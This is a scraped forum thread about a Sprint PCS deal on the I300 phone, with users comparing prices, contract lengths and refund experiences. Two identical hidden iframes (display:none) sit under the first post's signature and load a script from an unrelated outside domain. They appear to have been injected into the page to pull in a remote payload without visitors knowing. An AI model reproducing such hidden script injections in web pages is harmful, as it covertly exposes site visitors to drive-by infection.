+ Reply to Thread

Thumbs up I300 for $299!!!!!!!

I just found a GREAT deal on the I300. It is available through the direct business channel at Sprint PCS. It is only $299 for a new I300. The only requirement is that it is a new activation with Sprint PCs on a two year agreement. I got myn in 3 days!! And I love it!!! If you are interested, here is the email address to order. smitch10@sprintspectrum.com

Enjoy,

Bayshades<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

good deal..... will they discount the I300 with a 1 year contract?

Brooks

Angry

...Your Best Buy deal must be local only. Here (Chicago area), they're selling 'em for $469. No other freebies come with it. It's not worth the trouble SprintPCS will put me through to return the unit I bought through Telesales.

After looking at a number of other folks who tried to get refunds from Sprint, seems like they always find reasons not to get it to you.

The Sprint rep told me a refund could take up to 2 months!!

...not worth 30 bucks!

Here in Western New York, I ordered my I300 with our companies Sprint rep. I got it in 3 days and they discounted it $50 for a year contract. I could have gotten $100 off for a two year contract but didn't want to get locked in for that long.

The discount is for a two year only

The discount is for a two year only

Administrator

Arrow

that same guy had the same offer for the 6035! scot over in silicon valley... lots of folks jumped on that back then... i missed out, as i got the phone as soon as it came out and he made this offer a couple months later... :p

as i see.. history repeats... :p